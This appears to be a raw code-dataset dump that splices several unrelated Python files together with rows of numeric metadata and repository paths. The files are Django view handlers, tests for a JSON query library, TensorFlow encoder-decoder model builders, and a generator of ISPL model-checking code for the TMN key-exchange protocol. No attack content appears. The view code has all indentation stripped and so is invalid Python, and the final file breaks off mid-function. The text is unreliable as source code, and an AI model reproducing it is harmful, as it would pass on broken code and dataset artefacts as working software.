def update_anomaly(request):
if request.method == "POST":
try:
sample_service = AnomalyService()
return_dict = sample_service.update_anomaly(request.body)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def train(request):
if request.method == "POST":
try:
detect_service = DetectService()
return_dict = detect_service.process_train(json.loads(request.body))
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def download_sample(request):
if request.method == "GET":
try:
sample_service = SampleService()
file_name = sample_service.sample_download(request.GET['id'])
files = open(file_name, 'rb')
response = FileResponse(files)
response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment;filename = "SampleExport.csv"'
return response
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_GET)
return render_json(return_dict)
def predict_rate(request):
if request.method == "POST":
try:
detect_service = DetectService()
return_dict = detect_service.rate_predict(json.loads(request.body))
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def predict_value(request):
if request.method == "POST":
try:
detect_service = DetectService()
return_dict = detect_service.value_predict(json.loads(request.body))
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def query_train_task(request):
if request.method == "POST":
try:
train_service = TrainService()
return_dict = train_service.query_train(request.body)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def query_train_source(request):
if request.method == "POST":
try:
sample_service = SampleService()
return_dict = sample_service.query_sample_source()
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def delete_train_task(request):
if request.method == "POST":
try:
train_service = TrainService()
return_dict = train_service.delete_train(request.body)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def delete_sample(request):
if request.method == "POST":
try:
sample_service = SampleService()
return_dict = sample_service.delete_sample(request.body)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
def count_sample(request):
if request.method == "POST":
try:
sample_service = SampleService()
return_dict = sample_service.count_sample(request.body)
except Exception, ex:
return_dict = build_ret_data(THROW_EXP, str(ex))
return render_json(return_dict)
else:
return_dict = build_ret_data(NOT_POST)
return render_json(return_dict)
| 33.245 | 88 | 0.657994 | 803 | 6,649 | 5.124533 | 0.102117 | 0.167679 | 0.102066 | 0.122479 | 0.838882 | 0.823572 | 0.815796 | 0.794897 | 0.751883 | 0.751883 | 0 | 0.000203 | 0.258686 | 6,649 | 199 | 89 | 33.41206 | 0.834652 | 0.003158 | 0 | 0.717647 | 0 | 0 | 0.023242 | 0.003622 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.076471 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
95231052d68c061be7ca8d871719da5f62827c71 | 8,281 | py | Python | tests/test_ejson.py | tinybees/jsonquery | 5ff6b74c66656bcc34e7df161c6ab92cd1d9a1c7 | [
"MIT"
] | 2 | 2018-03-30T15:06:22.000Z | 2019-02-08T14:40:30.000Z | tests/test_ejson.py | tinybees/eqjson | 5ff6b74c66656bcc34e7df161c6ab92cd1d9a1c7 | [
"MIT"
] | null | null | null | tests/test_ejson.py | tinybees/eqjson | 5ff6b74c66656bcc34e7df161c6ab92cd1d9a1c7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding=utf-8
"""
@author: guoyanfeng
@software: PyCharm
@time: 2017-4-13 18:57
"""
import json
import unittest
from eqjson import EasyQueryjson
class TestEjson1(unittest.TestCase):
"""
ejson 单测第一种情况,以大括号开始
"""
@classmethod
def setUpClass(cls):
with open("json_test_1.json") as f:
json_doc = json.load(f)
cls.ejson_obj = EasyQueryjson(json_doc)
def test_101_get_first_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("id")
self.assertEqual(val, 1123123812831823)
def test_102_get_second_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("object.name")
self.assertEqual(val, "myLittleObject")
def test_103_get_third_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("object.valueAsString.0")
self.assertEqual(val, "one")
def test_104_get_third_tier_list0_dict_value(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("object.value.1.key")
self.assertEqual(val, "value2")
def test_105_get_list_all_key_value(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("object.value.key")
self.assertEqual(val, ["value1", "value2", "value3"])
def test_106_change_first_tier(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.change_value("id", "123456")
val = self.ejson_obj.get_value("id")
self.assertEqual(val, 123456)
def test_107_change_second_tier(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.change_value("object.name", "updatename")
val = self.ejson_obj.get_value("object.name")
self.assertEqual(val, "updatename")
def test_108_change_list_value(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.change_value("object.value.2", ["five", "four"])
val = self.ejson_obj.get_value("object.value.2")
self.assertEqual(val, ["five", "four"])
def test_111_append_value_list(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.append_value("object.value", "append_test")
val = self.ejson_obj.get_value("object.value")
self.assertIn("append_test", val)
def test_112_append_value_dict(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.append_value("object", {"test_name": "append_test"})
val = self.ejson_obj.get_value("object.test_name")
self.assertEqual(val, "append_test")
def test_113_remove_list_data_value(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.remove_value("object.value.0")
val = self.ejson_obj.get_value("object.value")
self.assertEqual(len(val), 3)
def test_114_remove_list_value(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.remove_value("object.value")
val = self.ejson_obj.get_value("object.value")
self.assertIsNone(val)
class TestEjson2(unittest.TestCase):
"""
ejson 单测第二种情况,以列表开始
"""
@classmethod
def setUpClass(cls):
with open("json_test_2.json") as f:
json_doc = json.load(f)
cls.ejson_obj = EasyQueryjson(json_doc)
def test_101_get_first_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("1.id")
self.assertEqual(val, 123456)
def test_102_get_second_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("0.object.name")
self.assertEqual(val, "myLittleObject")
def test_103_get_third_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("1.object.valueAsString.0")
self.assertEqual(val, "one")
def test_104_get_third_tier_list0_dict_value(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("1.object.value.1.key")
self.assertEqual(val, "value2")
def test_105_get_list_all_key_value(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("0.object.value.key")
self.assertEqual(val, ["value1", "value2", "value3"])
def test_106_change_first_tier(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.change_value("0.id", "123456")
val = self.ejson_obj.get_value("0.id")
self.assertEqual(val, 123456)
def test_107_change_second_tier(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.change_value("0.object.name", "updatename")
val = self.ejson_obj.get_value("0.object.name")
self.assertEqual(val, "updatename")
def test_107_change_list_value(self, ):
"""
Args:
self,
Returns:
"""
self.ejson_obj.change_value("1.object.value.2", ["five", "four"])
val = self.ejson_obj.get_value("1.object.value.2")
self.assertEqual(val, ["five", "four"])
class TestEjson3(unittest.TestCase):
"""
ejson 单测第二种情况,以列表开始
"""
@classmethod
def setUpClass(cls):
with open("json_test_3.json") as f:
json_doc = json.load(f)
cls.ejson_obj = EasyQueryjson(json_doc)
def test_101_get_first_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("[id=123456]")
self.assertEqual(val["id"], 123456)
def test_102_get_second_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("[id=123456].object.value")
self.assertEqual(len(val), 3)
def test_103_get_third_tier(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("[id=123456].object.value[key1=value1]")
self.assertEqual(len(val), 3)
def test_104_get_third_tier_list0_dict_value(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("[id=123456].object.value[key1=value1].key3")
self.assertEqual(val, "value3")
def test_105_get_list_all_key_value(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("1.object.value[key11=value11].key33")
self.assertEqual(val, "value33")
def test_106_get_value_by_mul_attr(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("1.object.value[key11=value11,key22=value22, key33=value33].key33")
self.assertEqual(val, "value33")
def test_107_get_list_by_mul_attr(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("1.object.value[key11=value11,key22=value22, key33=value33]")
self.assertEqual(len(val), 3)
def test_108_not_found_by_mul_attr(self, ):
"""
Args:
self,
Returns:
"""
val = self.ejson_obj.get_value("1.object.value[key11=value11,key22=value2, key33=value33]")
self.assertIs(val, None)
if __name__ == '__main__':
# unittest.main(verbosity=2)
test_load = unittest.TestLoader()
suite = test_load.loadTestsFromTestCase(TestEjson1)
suite.addTest(test_load.loadTestsFromTestCase(TestEjson2))
suite.addTest(test_load.loadTestsFromTestCase(TestEjson3))
unittest.TextTestRunner(verbosity=2).run(suite)
| 22.023936 | 106 | 0.55102 | 938 | 8,281 | 4.605544 | 0.130064 | 0.075926 | 0.105556 | 0.123148 | 0.843287 | 0.824074 | 0.824074 | 0.790278 | 0.74838 | 0.688194 | 0 | 0.04878 | 0.316749 | 8,281 | 375 | 107 | 22.082667 | 0.71474 | 0.10675 | 0 | 0.504132 | 0 | 0 | 0.159671 | 0.050371 | 0 | 0 | 0 | 0 | 0.231405 | 1 | 0.256198 | false | 0 | 0.024793 | 0 | 0.305785 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1f0c891578f5336bb64cf75328f73cda04ce726d | 8,894 | py | Python | core/models.py | CVLAB-Unibo/ATDT | 3ef50ae7682d7362525ec3eab845af3aa2a57fe7 | [
"MIT"
] | 16 | 2019-09-11T16:14:32.000Z | 2021-01-05T17:49:37.000Z | core/models.py | CVLAB-Unibo/ATDT | 3ef50ae7682d7362525ec3eab845af3aa2a57fe7 | [
"MIT"
] | 4 | 2020-01-28T22:16:59.000Z | 2021-08-25T14:49:39.000Z | core/models.py | CVLAB-Unibo/ATDT | 3ef50ae7682d7362525ec3eab845af3aa2a57fe7 | [
"MIT"
] | 1 | 2021-03-16T13:32:07.000Z | 2021-03-16T13:32:07.000Z | import numpy as np
import tensorflow as tf
from collections import namedtuple
from core.ops import *
from utils.utils import *
def build_vgg(inputs, use_skips = False, reuse_variables=False, normalizer_fn=None):
with tf.variable_scope('encoder', reuse=reuse_variables):
convs = []
convs.append(conv_block(inputs, 32, 7, normalizer_fn=normalizer_fn)) # H/2
convs.append(conv_block(convs[-1], 64, 5, normalizer_fn=normalizer_fn)) # H/4
convs.append(conv_block(convs[-1], 128, 3, normalizer_fn=normalizer_fn)) # H/8
convs.append(conv_block(convs[-1], 256, 3, normalizer_fn=normalizer_fn)) # H/16
convs.append(conv_block(convs[-1], 512, 3, normalizer_fn=normalizer_fn)) # H/32
convs.append(conv_block(convs[-1], 512, 3, normalizer_fn=normalizer_fn)) # H/64
convs.append(conv_block(convs[-1], 512, 3, normalizer_fn=normalizer_fn)) # H/128
#skips
skips=[]
if use_skips:
print("Adding Skip Connections")
skips=convs[:-1]
return convs,skips
def build_resnet50(inputs, use_skips = False, reuse_variables=False, normalizer_fn=None):
with tf.variable_scope('encoder', reuse=reuse_variables):
convs = []
convs.append( conv(inputs, 64, 7, 2, normalizer_fn=normalizer_fn)) # H/2 - 64D
convs.append( maxpool(convs[-1], 3)) # H/4 - 64D
convs.append(resblock(convs[-1], 64, 3, normalizer_fn=normalizer_fn)) # H/8 - 256D
convs.append(resblock(convs[-1], 128, 4, normalizer_fn=normalizer_fn)) # H/16 - 512D
convs.append(resblock(convs[-1], 256, 6, normalizer_fn=normalizer_fn)) # H/32 - 1024D
convs.append(resblock(convs[-1], 512, 3, normalizer_fn=normalizer_fn)) # H/64 - 2048D
#skips
skips=[]
if use_skips:
print("Adding Skip Connections")
skips=convs[:-1]
return convs, skips
def build_dilated_resnet50(inputs, use_skips = False, reuse_variables=False, normalizer_fn=None):
with tf.variable_scope('encoder', reuse=reuse_variables):
convs = []
convs.append( conv(inputs, 64, 7, 2, normalizer_fn=normalizer_fn)) # H/2 - 64D
convs.append( maxpool(convs[-1], 3)) # H/4 - 64D
convs.append(resblock(convs[-1], 64, 3, normalizer_fn=normalizer_fn)) # H/8 - 256D
convs.append(resblock(convs[-1], 128, 4, normalizer_fn=normalizer_fn)) # H/16 - 512D
convs.append(resblock_dilated(convs[-1], 256, 6, 2, normalizer_fn=normalizer_fn)) # H/16 - 1024D - R2
convs.append(resblock_dilated(convs[-1], 512, 3, 4, normalizer_fn=normalizer_fn)) # H/16 - 2048D - R4
#skips
skips=[]
if use_skips:
print("Adding Skip Connections")
skips=convs[1:-2]
return convs[1:], skips
def build_decoder_vgg(inputs, out_channels, skips= [], reuse_variables=False, normalizer_fn=None):
print("Adding Skip Connections") if skips else None
with tf.variable_scope('decoder', reuse=reuse_variables):
upconv7 = upconv(inputs, 512, 3, 2, normalizer_fn=normalizer_fn) #H/64
if skips:
upconv7 = tf.concat([upconv7, skips[5]], 3)
iconv7 = conv(upconv7, 512, 3, 1, normalizer_fn=normalizer_fn)
upconv6 = upconv(iconv7, 512, 3, 2, normalizer_fn=normalizer_fn) #H/32
if skips:
upconv6 = tf.concat([upconv6, skips[4]], 3)
iconv6 = conv(upconv6, 512, 3, normalizer_fn=normalizer_fn)
upconv5 = upconv(iconv6, 256, 3, 2, normalizer_fn=normalizer_fn) #H/16
if skips:
upconv5 = tf.concat([upconv5, skips[3]], 3)
iconv5 = conv(upconv5, 256, 3, 1, normalizer_fn=normalizer_fn)
upconv4 = upconv(iconv5, 128, 3, 2, normalizer_fn=normalizer_fn) #H/8
if skips:
upconv4 = tf.concat([upconv4, skips[2]], 3)
iconv4 = conv(upconv4, 128, 3, 1, normalizer_fn=normalizer_fn)
upconv3 = upconv(inputs, 64, 3, 2, normalizer_fn=normalizer_fn) #H/4
if skips:
upconv3 = tf.concat([upconv3, skips[1]], 3)
iconv3 = conv(upconv3, 64, 3, 1, normalizer_fn=normalizer_fn)
upconv2 = upconv(iconv3, 32, 3, 2, normalizer_fn=normalizer_fn) #H/2
if skips:
upconv2 = tf.concat([upconv2, skips[0]], 3)
iconv2 = conv(upconv2, 32, 3, 1, normalizer_fn=normalizer_fn)
upconv1 = upconv(iconv2, out_channels, 3, 2, normalizer_fn=None) #H
iconv1 = conv(upconv1, out_channels, 3, 1, activation_fn=None)
return iconv1
def build_decoder_resnet(inputs, out_channels, skips= [], reuse_variables=False, normalizer_fn=None):
print("Adding Skip Connections") if skips else None
with tf.variable_scope('decoder', reuse=reuse_variables):
upconv6 = upconv(inputs, 512, 3, 2, normalizer_fn=normalizer_fn) #H/32
if skips:
upconv6 = tf.concat([upconv6, skips[4]], 3)
iconv6 = conv(upconv6, 512, 3, 1, normalizer_fn=normalizer_fn)
upconv5 = upconv(iconv6, 256, 3, 2, normalizer_fn=normalizer_fn) #H/16
if skips:
upconv5 = tf.concat([upconv5, skips[3]], 3)
iconv5 = conv(upconv5, 256, 3, 1, normalizer_fn=normalizer_fn)
upconv4 = upconv(iconv5, 128, 3, 2, normalizer_fn=normalizer_fn) #H/8
if skips:
upconv4 = tf.concat([upconv4, skips[2]], 3)
iconv4 = conv(upconv4, 128, 3, 1, normalizer_fn=normalizer_fn)
upconv3 = upconv(iconv4, 64, 3, 2, normalizer_fn=normalizer_fn) #H/4
if skips:
upconv3 = tf.concat([upconv3, skips[1]], 3)
iconv3 = conv(upconv3, 64, 3, 1, normalizer_fn=normalizer_fn)
upconv2 = upconv(iconv3, 32, 3, 2) #H/2
if skips:
upconv2 = tf.concat([upconv2, skips[0]], 3)
iconv2 = conv(upconv2, 32, 3, 1, normalizer_fn=normalizer_fn)
upconv1 = upconv(iconv2, out_channels, 3, 2, normalizer_fn=None) #H
iconv1 = conv(upconv1, out_channels, 3, 1, activation_fn=None)
return iconv1
def build_decoder_dilated_resnet(inputs, out_channels, skips= [], reuse_variables=False, normalizer_fn=None):
print("Adding Skip Connections") if skips else None
with tf.variable_scope('decoder', reuse=reuse_variables):
upconv4 = upconv(inputs, 128, 3, 2, normalizer_fn=normalizer_fn) #H/8
if skips:
upconv4 = tf.concat([upconv4, skips[-1]], 3)
iconv4 = conv(upconv4, 128, 3, 1, normalizer_fn=normalizer_fn)
upconv3 = upconv(iconv4, 64, 3, 2, normalizer_fn=normalizer_fn) #H/4
if skips:
upconv3 = tf.concat([upconv3, skips[-2]], 3)
iconv3 = conv(upconv3, 64, 3, 1, normalizer_fn=normalizer_fn)
upconv2 = upconv(iconv3, 32, 3, 2) #H/2
if skips:
upconv2 = tf.concat([upconv2, skips[-3]], 3)
iconv2 = conv(upconv2, 32, 3, 1, normalizer_fn=normalizer_fn)
upconv1 = upconv(iconv2, out_channels, 3, 2, normalizer_fn=None) #H
iconv1 = conv(upconv1, out_channels, 3, 1, activation_fn=None)
return iconv1
def build_model(inputs, out_channels, use_skips=False, encoder='dilated-resnet', name='model', reuse_variables=False, normalizer_fn=None):
with tf.variable_scope(name, reuse=reuse_variables):
if encoder == 'vgg':
print("Building VGG")
features, skips = build_vgg(inputs, use_skips=use_skips, normalizer_fn=normalizer_fn)
output = build_decoder_vgg(features[-1], out_channels, skips, normalizer_fn=normalizer_fn)
return output, features
elif encoder == 'resnet':
print("Building ResNet50")
features, skips = build_resnet50(inputs, use_skips=use_skips, normalizer_fn=normalizer_fn)
output = build_decoder_resnet(features[-1], out_channels, skips, normalizer_fn=normalizer_fn)
return output, features
elif encoder == 'dilated-resnet':
print("Building Dilated-ResNet50")
features, skips = build_dilated_resnet50(inputs, use_skips=use_skips, normalizer_fn=normalizer_fn)
output = build_decoder_dilated_resnet(features[-1], out_channels, skips, normalizer_fn=normalizer_fn)
return output, features
else:
raise NotImplementedError("Architecture not implemented")
def transfer_network(features_source, normalizer_fn=None):
conv1 = conv(features_source,2048,3,2)
conv2 = conv(conv1,2048,3,2)
upconv1 = upconv(conv2, 2048, 3, 2)
iconv1 = conv(upconv1, 2048, 3, 1)
upconv2 = upconv(iconv1, 2048, 3, 2)
adapted_feature = conv(upconv2, features_source.get_shape()[-1], 3, 1)
return adapted_feature | 53.257485 | 138 | 0.631549 | 1,176 | 8,894 | 4.607993 | 0.091837 | 0.241373 | 0.19893 | 0.217014 | 0.843144 | 0.834656 | 0.787968 | 0.762687 | 0.762687 | 0.762687 | 0 | 0.074163 | 0.248032 | 8,894 | 167 | 139 | 53.257485 | 0.736095 | 0.029571 | 0 | 0.610738 | 0 | 0 | 0.035382 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053691 | false | 0 | 0.033557 | 0 | 0.154362 | 0.060403 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
1f7d811ee13b36fdbaa2ca5cf27c0c16c0bc6785 | 59,753 | py | Python | stv/generators/ispl/tmn.py | wp777/stv-compute | 313b574c43ef87b629e70c25c38dbb7b24d1f130 | [
"MIT"
] | 2 | 2021-07-11T09:52:59.000Z | 2022-02-13T17:34:59.000Z | stv/generators/ispl/tmn.py | wp777/stv-compute | 313b574c43ef87b629e70c25c38dbb7b24d1f130 | [
"MIT"
] | 3 | 2020-07-26T13:49:59.000Z | 2021-01-19T18:04:10.000Z | stv/generators/ispl/tmn.py | wp777/stv-compute | 313b574c43ef87b629e70c25c38dbb7b24d1f130 | [
"MIT"
] | null | null | null | from stv.tools.string_tools import StringTools
class TmnProtocolIsplGenerator:
# TODO: integrate with IsplGenerator class
ispl_model = ""
agents = ["alice", "bob", "server", "attacker"]
no_messages = 3
def __init__(self):
return
def create_ispl_model(self):
self.ispl_model += self.__define_semantics()
self.ispl_model += self.__create_environment()
self.ispl_model += self.__create_alice()
self.ispl_model += self.__create_bob()
self.ispl_model += self.__create_server()
self.ispl_model += self.__create_attacker()
self.ispl_model += self.__create_evaluation()
self.ispl_model += self.__create_init_states()
self.ispl_model += self.__create_groups()
self.ispl_model += self.__create_formulae()
return self.ispl_model
def __define_semantics(self):
semantics = "Semantics=SingleAssignment;\n\n"
return semantics
def __create_environment(self):
environment = "Agent Environment\n"
environment += self.__create_environment_obsvars()
environment += self.__create_environment_vars()
environment += self.__create_environment_actions()
environment += self.__create_environment_protocol()
environment += self.__create_environment_evolution()
environment += "end Agent\n\n"
return environment
def __create_environment_obsvars(self):
obsvars = "\tObsvars:\n"
for message_no in range(1, self.no_messages + 1):
obsvars += f"\t\tmessage{message_no}Key : " + "{"
for agent_name in self.agents:
obsvars += f"{agent_name}KeyM, "
obsvars = obsvars.rstrip(" ,")
obsvars += "};\n"
for message_no in range(1, self.no_messages + 1):
obsvars += f"\t\tmessage{message_no}Content : " + "{"
for agent_name in self.agents:
obsvars += f"{agent_name}KeyM, "
obsvars = obsvars.rstrip(" ,")
obsvars += "};\n"
obsvars += "\t\tprotocol : boolean;\n"
obsvars += "\tend Obsvars\n"
return obsvars
def __create_environment_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_environment_actions(self):
actions = "\tActions = {none};\n"
return actions
def __create_environment_protocol(self):
protocol = "\tProtocol:\n\t\tOther: {none};\n\tend Protocol\n"
return protocol
def __create_environment_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_alice(self):
agent = "Agent Alice\n"
agent += self.__create_alice_vars()
agent += self.__create_alice_actions()
agent += self.__create_alice_protocol()
agent += self.__create_alice_evolution()
agent += "end Agent\n\n"
return agent
def __create_alice_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_alice_vars(self):
vars = "\tVars:\n"
for agent_name in self.agents:
vars += f"\t\t{agent_name}Key : boolean;\n"
for message_no in range(1, self.no_messages + 1):
vars += f"\t\tmessage{message_no} : " + "{none, plain, encrypted};\n"
vars += "\tend Vars\n"
return vars
def __create_alice_actions(self):
actions = "\tActions = {"
for message_no in range(1, self.no_messages + 1):
actions += f"decryptMessage{message_no}, "
for agent_name in self.agents:
if agent_name == 'alice':
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
actions += f"sendMessage{message_no}To{agent_name}, "
actions += "Wait};\n"
return actions
def __create_alice_protocol(self):
protocol = "\tProtocol:\n"
for message_no in range(1, self.no_messages + 1):
for agent_name in self.agents:
protocol += f"\t\t(message{message_no}=encrypted and {agent_name}Key=true and Environment.message{message_no}Key={agent_name}KeyM) or\n"
protocol = protocol.rstrip("\nro ")
protocol += ": {" + f"decryptMessage{message_no}" + "};\n"
for message_no in range(1, self.no_messages + 1):
protocol += f"\t\t(message{message_no}=plain and Environment.protocol=false): " + "{"
for agent_name in self.agents:
if agent_name == 'alice':
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
protocol += f"sendMessage{message_no}To{agent_name}, "
protocol += "Wait};\n"
protocol += "\t\t(message1=plain and Environment.protocol=true): {sendMessage1ToServer};\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_alice_evolution(self):
evolution = "\tEvolution:\n"
for agent_name in self.agents:
evolution += f"\t\t{agent_name}Key=true if\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\t\t(Action=decryptMessage{message_no} and Environment.message{message_no}Content={agent_name}KeyM) or\n"
evolution = evolution.rstrip("\nro ")
evolution += ";\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\tmessage{message_no}=plain if Action=decryptMessage{message_no};\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\tmessage{message_no}=encrypted if\n"
evolution += f"\t\t\tmessage{message_no}=none and (\n"
for agent_name in self.agents:
if agent_name == "alice":
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
evolution += f"\t\t\t{agent_name}.Action=sendMessage{message_no}ToAlice or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
evolution += "\tend Evolution\n"
return evolution
def __create_bob(self):
agent = "Agent Bob\n"
agent += self.__create_bob_vars()
agent += self.__create_bob_actions()
agent += self.__create_bob_protocol()
agent += self.__create_bob_evolution()
agent += "end Agent\n\n"
return agent
def __create_bob_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_bob_vars(self):
vars = "\tVars:\n"
for agent_name in self.agents:
vars += f"\t\t{agent_name}Key : boolean;\n"
for message_no in range(1, self.no_messages + 1):
vars += f"\t\tmessage{message_no} : " + "{none, plain, encrypted};\n"
vars += "\tend Vars\n"
return vars
def __create_bob_actions(self):
actions = "\tActions = {"
for message_no in range(1, self.no_messages + 1):
actions += f"decryptMessage{message_no}, "
for agent_name in self.agents:
if agent_name == 'bob':
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
actions += f"sendMessage{message_no}To{agent_name}, "
actions += "Wait};\n"
return actions
def __create_bob_protocol(self):
protocol = "\tProtocol:\n"
for message_no in range(1, self.no_messages + 1):
for agent_name in self.agents:
protocol += f"\t\t(message{message_no}=encrypted and {agent_name}Key=true and Environment.message{message_no}Key={agent_name}KeyM) or\n"
protocol = protocol.rstrip("\nro ")
protocol += ": {" + f"decryptMessage{message_no}" + "};\n"
for message_no in range(1, self.no_messages + 1):
protocol += f"\t\t(message{message_no}=plain and Environment.protocol=false): " + "{"
for agent_name in self.agents:
if agent_name == 'bob':
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
protocol += f"sendMessage{message_no}To{agent_name}, "
protocol += "Wait};\n"
protocol += "\t\t(message2=plain and Environment.protocol=true): {sendMessage2ToServer};\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_bob_evolution(self):
evolution = "\tEvolution:\n"
for agent_name in self.agents:
evolution += f"\t\t{agent_name}Key=true if\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\t\t(Action=decryptMessage{message_no} and Environment.message{message_no}Content={agent_name}KeyM) or\n"
evolution = evolution.rstrip("\nro ")
evolution += ";\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\tmessage{message_no}=plain if Action=decryptMessage{message_no};\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\tmessage{message_no}=encrypted if\n"
evolution += f"\t\t\tmessage{message_no}=none and (\n"
for agent_name in self.agents:
if agent_name == "bob":
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
evolution += f"\t\t\t{agent_name}.Action=sendMessage{message_no}ToBob or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
evolution += "\tend Evolution\n"
return evolution
def __create_server(self):
agent = "Agent Server\n"
agent += self.__create_server_vars()
agent += self.__create_server_actions()
agent += self.__create_server_protocol()
agent += self.__create_server_evolution()
agent += "end Agent\n\n"
return agent
def __create_server_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_server_vars(self):
vars = "\tVars:\n"
for agent_name in self.agents:
vars += f"\t\t{agent_name}Key : boolean;\n"
for message_no in range(1, self.no_messages + 1):
vars += f"\t\tmessage{message_no} : " + "{none, plain, encrypted};\n"
vars += "\tend Vars\n"
return vars
def __create_server_actions(self):
actions = "\tActions = {"
for message_no in range(1, self.no_messages + 1):
actions += f"decryptMessage{message_no}, "
for agent_name in self.agents:
if agent_name == 'server':
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
actions += f"sendMessage{message_no}To{agent_name}, "
actions += "Wait};\n"
return actions
def __create_server_protocol(self):
protocol = "\tProtocol:\n"
for message_no in range(1, self.no_messages + 1):
for agent_name in self.agents:
protocol += f"\t\t(message{message_no}=encrypted and {agent_name}Key=true and Environment.message{message_no}Key={agent_name}KeyM) or\n"
protocol = protocol.rstrip("\nro ")
protocol += ": {" + f"decryptMessage{message_no}" + "};\n"
for message_no in range(1, self.no_messages + 1):
protocol += f"\t\t(message{message_no}=plain and Environment.protocol=false): " + "{"
for agent_name in self.agents:
if agent_name == 'server':
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
protocol += f"sendMessage{message_no}To{agent_name}, "
